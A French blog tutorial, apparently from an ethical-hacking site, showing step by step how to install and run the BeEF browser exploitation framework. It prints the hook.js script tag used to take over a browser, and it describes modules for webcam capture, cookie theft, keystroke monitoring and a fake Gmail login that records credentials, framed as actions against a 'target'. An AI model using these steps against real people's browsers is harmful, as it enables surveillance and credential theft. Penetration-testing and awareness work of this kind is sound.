Login

Lost your password?
Don't have an account? Sign Up

Piratez les navigateurs Web avec BeEF pour contrôler les webcams et capturer les inf

Les gens utilisent les navigateurs pour tous les types de choses, et en général, nous leur confions beaucoup d’informations personnelles. C’est pourquoi les navigateurs sont une surface d’attaque parfaite pour un pirate informatique, car la cible peut même ne pas savoir qu’elle est infectée et vous fournir toutes les informations que vous pourriez souhaiter.

Pour ce faire, vous devez d’abord inciter l’utilisateur à cliquer sur un lien. Pour générer le lien, vous pouvez utiliser un outil appelé BeEF , qui était auparavant préinstallé sur Kali Linux .

Semblable à Metasploit , BeEF, qui signifie Browser Exploitation Framework, est un framework pour lancer des attaques. Contrairement à Metasploit, il est spécifique au lancement d’attaques contre les navigateurs Web. Dans certains cas, nous pourrions utiliser BeEF en conjonction avec Metasploit pour lancer des scénarios d’attaque plus avancés.

L’outil a été développé par un groupe de développeurs dirigé par Wade Alcorn . Construit sur la plate-forme familière Ruby on Rails, BeEF a été conçu pour explorer les vulnérabilités des navigateurs et les tester. En particulier, BeEF est une excellente plateforme pour tester la vulnérabilité d’un navigateur au cross-site scripting (XSS) et à d’autres attaques par injection.

BeEF peut générer un lien qui peut suivre la cible et même exécuter des modules pour à la fois augmenter les autorisations et recueillir plus d’informations sur la personne derrière l’ordinateur. Il peut même numériser derrière le réseau sur lequel se trouve la personne, ce qui est assez impressionnant car vous pouvez prendre des photos avec sa webcam, voir ce qu’il tape et lancer des pages de phishing pour essayer d’obtenir des informations d’identification.

Étape 1

Installez BeEF

BeEF est intégré directement à Kali Linux 2019.2 et versions antérieures, vous ne devriez donc pas avoir à installer quoi que ce soit si vous exécutez l’une de ces versions sur votre ordinateur.

À la mi-2019, Kali a supprimé BeEF en tant qu’outil d’exploitation préinstallé, le déplaçant de “kali-linux-default” au métapaquet “kali-linux-large”. Cela signifie que si vous avez installé une nouvelle version de Kali, vous n’auriez plus BeEF, cependant, vous pouvez le conserver si vous avez simplement mis à jour votre ancienne version de Kali vers 2019.3 ou une version ultérieure.

Si vous l’avez déjà, utilisez la commande suivante pour tout mettre à jour. Et si vous ne l’avez pas, la même commande l’installera. Assurez-vous simplement d’utiliser beef-xss et non “beef” car ce dernier est un interpréteur de langage de programmation, ce qui est différent. 

~$ sudo apt install beef-xss

Que vous l’aviez déjà préinstallé ou que vous deviez l’installer, le reste est le même.

Étape 2

Ouvrez le service BeEF

Une fois BeEF installé, vous pouvez le trouver sous Applications -> Services système, puis cliquez sur “BeEF start”. Cela ouvrira une fenêtre de terminal pour démarrer le service.

Si vous ne voyez aucun outil lié a beef dans ce dossier, ou si vous ne voyez pas du tout ce dossier, vous avez peut-être installé “beef” et non “beef-xss” alors assurez-vous de faire ce dernier. (Vous pouvez également démarrer BeEF à partir du dossier Exploitation Tools où se trouve “beef xss framework.)

> Executing “sudo beef-xss”
[sudo] password for kali:

[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:

[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*]  Web UI: http://127.0.0.1:3000/ui/panel
[*]    Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

● beef-xss.service - LSB: BeEF
     Loaded: loaded (/etc/init.d/beef-xss; generated)
     Active: active (running) since Fri 2020-05-08 12:51:38 EDT; 5s ago
       Docs: man:systemd-sysv-generator(8)
    Process: 1432 ExecStart+/etc/init.d/beef-xss start (code=excited, status=0/SUCCESS)
      Tasks: 10 (limit: 6715)
     Memory: 140.8M
     CGroup: /system.slice/beef-xss.service
             └─1438 ruby /usr/share/beef-xss/beef

May 08 12:51:42 kali beef[1]: Starting LSB: BeEF...
May 08 12:51:42 kali beef[1]: Started LSB: BeEF.

[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...

Si vous rencontrez des erreurs où votre navigateur ne parvient pas à se charger, vous pouvez contourner le problème en ouvrant votre navigateur Web préféré, comme Firefox ou Chrome, et en accédant à l’URL suivante, qui est pour le serveur Web localhost (127.0.0.1) à avec le port 3000.

http://127.0.0.1:3000/ui/panel

Étape 3

Connectez-vous au service BeEF

Une fois l’interface du navigateur ouverte, vous devrez vous connecter au service BeEF. Les informations d’identification par défaut sont beef pour le nom d’utilisateur et beef pour le mot de passe. Cependant, vous avez peut-être été invité à créer un mot de passe pour votre session de beef (comme vu ci-dessus), et dans ce cas, vous utiliseriez beef comme nom d’utilisateur et quel que soit le mot de passe que vous avez choisi.

Après vous être connecté avec succès, vous devriez voir la page “Mise en route” avec des informations sur le fonctionnement de BeEF. Sur la gauche, il y a la colonne Navigateurs accrochés , qui est l’endroit où tous les navigateurs que vous contrôlez aboutiront.

Étape 4

Accrocher le navigateur cible

La clé du succès avec BeEF est de «hooker» un navigateur. Cela signifie essentiellement que nous avons besoin que la cible visite une application Web vulnérable avec le fichier JavaScript “hook.js”. Pour vous entraîner, BeEF fournit une page Web pour votre hôte local avec la charge utile, alors visitez-la pour voir comment cela fonctionne.

http://127.0.0.1:3000/demos/basic.html

Le code injecté dans le navigateur accroché répond aux commandes du serveur BeEF que nous contrôlons. À partir de là, nous pouvons faire de nombreuses choses malicieuses sur l’ordinateur de la cible.

Étape 5

Afficher les détails du navigateur

J’ai quelques navigateurs accrochés, mais je vais regarder celui de Chrome. Cliquez sur votre navigateur accroché, et il vous mènera à l’onglet “Détails”, qui fournit des informations sur le navigateur accroché. Le mien apparaît comme Chrome dans les valeurs.

Cet onglet vous en montrera bien plus que cela. Pour moi, je vois que la plate-forme est Linux x86_64; qu’il dispose du plug-in Chrome PDF, de la visionneuse Chrome PDF et des plug-ins Native Client; les composants incluent webgl, webrtc et websocket; et d’autres informations intéressantes.

Étape 6

Exécuter les commandes dans le navigateur

Maintenant que nous avons accroché le navigateur de la cible, nous pouvons exécuter certains des modules intégrés à partir de l’onglet “Commandes”.

Il existe plus de 300 modules, des hacks de navigateur à l’ingénierie sociale, y compris, mais certainement pas limité à:

  • Obtenir les domaines visités (navigateur)
  • Obtenir les URL visitées (navigateur)
  • Webcam (navigateur)
  • Obtenir tous les cookies (extension)
  • Récupérer des contacts Google (extension)
  • Capture d’écran (extension)
  • Voler la saisie semi-automatique (ingénierie sociale)
  • Google Phishing (ingénierie sociale)

Lorsque vous trouvez un module que vous souhaitez utiliser, sélectionnez-le, puis cliquez sur «Exécuter» sous sa description. A titre d’exemple, je vais utiliser le module “Google Phishing” dans le dossier “Social Engineering”.

Après son exécution, une fausse page de connexion Gmail apparaîtra dans le navigateur accroché. L’utilisateur ne peut pas réfléchir à deux fois avant d’insérer son nom d’utilisateur et son mot de passe, et une fois qu’ils le font, nous les enregistrons. Ensuite, ils sont redirigés vers le site de Google comme s’ils se connectaient régulièrement.

Pour trouver le nom d’utilisateur et le mot de passe que nous avons enregistrés, cliquez simplement sur la commande dans la colonne Historique des résultats du module . Pour moi, je vois “hfhfhf” comme utilisateur et “sdliasdflihasdflh” comme mot de passe. Vous pouvez également afficher ces informations à partir de l’onglet “Journaux”.

Si nous le voulions, nous pourrions personnaliser l’URL utilisée par le module Google Phishing, au cas où vous voudriez utiliser quelque chose de plus crédible que l’ancienne interface Gmail.

Une fois que nous avons accroché le navigateur, il y a des possibilités presque illimitées de ce que nous pouvons faire. Vous pouvez même exploiter BeEF pour les attaques du système d’exploitation. Pour plus d’exemples de ce que BeEF peut vous aider à accomplir, comme l’accès à la webcam et la surveillance des frappes au clavier, 

BeEF est un puissant outil d’attaque de navigateur Web

BeEF est un outil extraordinaire et puissant pour exploiter les navigateurs Web, et c’est un exemple terrifiant de pourquoi vous ne devriez jamais cliquer sur des liens suspects. Même si les choses semblent bien, vous devez être très prudent avec tout ce qui apparaît dans votre navigateur pour obtenir la permission d’accéder à votre webcam ou à l’audio ou qui nécessite que vous saisissiez les informations d’identification du compte.

Admin bar avatar
http://hackingtutoriels.com
Hacking Tutoriels est un blog professionnel ouvert à toute personne désireuse d'apprendre le Hacking Ethique par des cours et tutoriels de qualités régulièrement mis à jour. Tous les cours et tutoriels sont dispensé à but éducatif. L'utiliser à d'autres fin non-légale est de la responsabilité de l’Étudiant

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

*
*